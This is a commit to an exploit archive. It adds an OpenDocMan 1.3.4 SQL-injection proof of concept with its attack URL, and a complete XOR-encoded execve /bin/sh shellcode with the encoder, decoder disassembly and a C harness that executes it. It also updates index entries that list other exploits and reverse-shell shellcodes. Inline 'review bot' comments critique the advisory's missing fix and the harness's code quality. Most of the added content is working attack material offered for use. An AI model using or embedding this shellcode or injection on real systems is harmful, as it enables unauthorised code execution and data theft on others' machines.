DB: 2019-03-06
2 changes to exploits/shellcodes STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2) Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload) Splunk Enterprise 7.2.4 - Custom App Remote Command Execution (Persistent Backdoor / Custom Binary) elFinder 2.1.47 - Command Injection vulnerability in the PHP connector elFinder 2.1.47 - 'PHP connector' Command Injection OpenDocMan 1.3.4 - 'search.php where' SQL Injection Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes) Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes) Linux/x86 - XOR Encoder / Decoder execve() /bin/sh Shellcode (45 bytes)
This commit is contained in:
parent
a37e3008e5
commit
dd4f02248d
4 changed files with 123 additions and 4 deletions
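--- a/exploits/php/webapps/46500.txt
+++ b/exploits/php/webapps/46500.txt
@@ -0,0 +1,22 @@
+===========================================================================================
+# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection
+# CVE: N/A
+# Date: 05/03/2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
+# Software Link: https://sourceforge.net/projects/opendocman/files/
+# Version: v1.3.4
+# Category: Webapps
+# Tested on: Wamp64, @Win
+# Software description: OpenDocMan is a web based document management
+system (DMS) written in PHP designed
+to comply with ISO 17025 and OIE standard for document management.
+It features fine grained control of access to files, and automated
+install and upgrades.
+===========================================================================================
+# POC - SQLi
+# Parameters : where
+# Attack Pattern : %2527
+# GET Request :
+http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
+===========================================================================================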
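Review bot: The advisory names the injection point (`where` on search.php) but gives no remediation or affected code location, so a reader triaging this entry has nothing to verify a fix against; a line such as `# Fix: validate 'where' against an allow-list of column names or bind it as a prepared-statement parameter in search.php` would make the entry actionable for defenders. The in-file title `’where’ SQL Injection` uses typographic quotes and differs from the index description `'search.php where' SQL Injection` added to files.csv in the same commit; the two should match. `# CVE: N/A` is also worth rechecking before publication, since the index line carries no identifier either.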
|
@ -10239,7 +10239,7 @@ id,file,description,date,author,type,platform,port
|
|||
45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows,
|
||||
45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
|
||||
45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
|
||||
45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2019-03-04,"Ivan Ivanovic",local,windows,
|
||||
45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2018-09-15,"Ivan Ivanovic",local,windows,
|
||||
45653,exploits/windows/local/45653.rb,"Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
|
||||
45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
|
||||
45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
|
||||
|
@ -40442,7 +40442,7 @@ id,file,description,date,author,type,platform,port
|
|||
45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
|
||||
45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
|
||||
45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php,
|
||||
46487,exploits/windows/webapps/46487.py,"Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)",2019-03-04,"Matteo Malvica",webapps,windows,8000
|
||||
46487,exploits/windows/webapps/46487.py,"Splunk Enterprise 7.2.4 - Custom App Remote Command Execution (Persistent Backdoor / Custom Binary)",2019-03-04,"Matteo Malvica",webapps,windows,8000
|
||||
45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows,
|
||||
45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java,
|
||||
45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64,
|
||||
|
@ -40941,9 +40941,10 @@ id,file,description,date,author,type,platform,port
|
|||
46468,exploits/linux/webapps/46468.rb,"Usermin 1.750 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,linux,
|
||||
46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,
|
||||
46480,exploits/php/webapps/46480.txt,"CMSsite 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80
|
||||
46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - Command Injection vulnerability in the PHP connector",2019-03-04,q3rv0,webapps,php,80
|
||||
46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - 'PHP connector' Command Injection",2019-03-04,q3rv0,webapps,php,80
|
||||
46494,exploits/windows/webapps/46494.py,"MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal",2019-03-04,0v3rride,webapps,windows,
|
||||
46495,exploits/php/webapps/46495.txt,"Bolt CMS 3.6.4 - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
|
||||
46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
|
||||
46497,exploits/php/webapps/46497.txt,"WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities",2019-03-04,ed0x21son,webapps,php,80
|
||||
46498,exploits/hardware/webapps/46498.txt,"Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting",2019-03-04,Tauco,webapps,hardware,80
|
||||
46500,exploits/php/webapps/46500.txt,"OpenDocMan 1.3.4 - 'search.php where' SQL Injection",2019-03-05,"Mehmet EMIROGLU",webapps,php,80
|
||||
|
|
|
|
@ -843,7 +843,7 @@ id,file,description,date,author,type,platform
|
|||
43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64
|
||||
43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator
|
||||
43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64
|
||||
46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86
|
||||
46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86
|
||||
44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm
|
||||
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
|
||||
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
|
||||
|
@ -948,3 +948,4 @@ id,file,description,date,author,type,platform
|
|||
46395,shellcodes/macos/46395.c,"macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
|
||||
46396,shellcodes/macos/46396.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
|
||||
46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
|
||||
46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve() /bin/sh Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86
|
||||
|
|
|
95
shellcodes/linux_x86/46499.c
Normal file
|
@ -0,0 +1,95 @@
|
|||
/*
|
||||
; Date: 26/02/2019
|
||||
; XOR-Encoder.py
|
||||
; Author: Daniele Votta
|
||||
; Description: This program encode shellcode with XOR technique.
|
||||
; Tested on: i686 GNU/Linux
|
||||
; Shellcode Length:25
|
||||
|
||||
#!/usr/bin/python
|
||||
# Python XOR Encoder
|
||||
|
||||
# Execve /bin/sh
|
||||
shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
|
||||
|
||||
encoded = ""
|
||||
encoded2 = ""
|
||||
|
||||
print 'Encoded shellcode...'
|
||||
|
||||
for x in bytearray(shellcode):
|
||||
# XOR Encoding
|
||||
y = x^0xAA
|
||||
encoded += '\\x'
|
||||
encoded += '%02x' % y
|
||||
encoded2 += '0x'
|
||||
encoded2 += '%02x,' % y
|
||||
|
||||
print encoded +"\n"
|
||||
print encoded2
|
||||
print 'Len: %d' % len(bytearray(shellcode))
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
/*
|
||||
|
||||
; XOR-Decoder.asm
|
||||
; Author: Daniele Votta
|
||||
; Description: This program decode shellcode with XOR technique.
|
||||
; Tested on: i686 GNU/Linux
|
||||
; Shellcode Length:45
|
||||
; JMP | CALL | POP | Techniques
|
||||
|
||||
XOR-Decoder: file format elf32-i386
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
08048080 <_start>:
|
||||
8048080: eb 0d jmp 804808f <call_decoder>
|
||||
|
||||
08048082 <decoder>:
|
||||
8048082: 5e pop esi
|
||||
8048083: 31 c9 xor ecx,ecx
|
||||
8048085: b1 19 mov cl,0x19
|
||||
|
||||
08048087 <decode>:
|
||||
8048087: 80 36 aa xor BYTE PTR [esi],0xaa
|
||||
804808a: 46 inc esi
|
||||
804808b: e2 fa loop 8048087 <decode>
|
||||
804808d: eb 05 jmp 8048094 <Shellcode>
|
||||
|
||||
0804808f <call_decoder>:
|
||||
804808f: e8 ee ff ff ff call 8048082 <decoder>
|
||||
|
||||
08048094 <Shellcode>:
|
||||
8048094: 9b fwait
|
||||
8048095: 6a fa push 0xfffffffa
|
||||
8048097: c2 85 85 ret 0x8585
|
||||
804809a: d9 c2 fld st(2)
|
||||
804809c: c2 85 c8 ret 0xc885
|
||||
804809f: c3 ret
|
||||
80480a0: c4 23 les esp,FWORD PTR [ebx]
|
||||
80480a2: 49 dec ecx
|
||||
80480a3: fa cli
|
||||
80480a4: 23 48 f9 and ecx,DWORD PTR [eax-0x7]
|
||||
80480a7: 23 4b 1a and ecx,DWORD PTR [ebx+0x1a]
|
||||
80480aa: a1 .byte 0xa1
|
||||
80480ab: 67 addr16
|
||||
80480ac: 2a .byte 0x2a
|
||||
[+] Extract Shellcode ...
|
||||
"\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x36\xaa\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a"
|
||||
======================= POC Daniele Votta =======================
|
||||
*/
|
||||
|
||||
/* XOR Encoded (0xAA) Execve /bin/sh */
|
||||
unsigned char code[] = \
|
||||
"\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x36\xaa\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a";
|
||||
|
||||
int main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
}
|
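Review bot: `printf("Shellcode Length: %d\n", strlen(code));` in main passes a `size_t` to `%d`, a format/argument mismatch that `-Wformat` flags and that is undefined behaviour; it should read `printf("Shellcode Length: %zu\n", strlen((const char *)code));`, which also removes the pointer-sign warning from passing `unsigned char *` to `strlen`. The reported length is only correct because no byte in the encoded literal is 0x00, which deserves a comment next to the call, e.g. `/* encoded bytes contain no 0x00, so strlen() yields the full 45 */`. `int main()` should be `int main(void)` to match the file's C99 headers. The decoder stub rewrites the buffer in place (`xor BYTE PTR [esi],0xaa`, then `jmp` into it), so this harness only runs where the page holding `code` is both writable and executable; the header comment should state that requirement explicitly, since it is exactly the condition that W^X/NX enforcement removes and explains why the sample does nothing on a default hardened build.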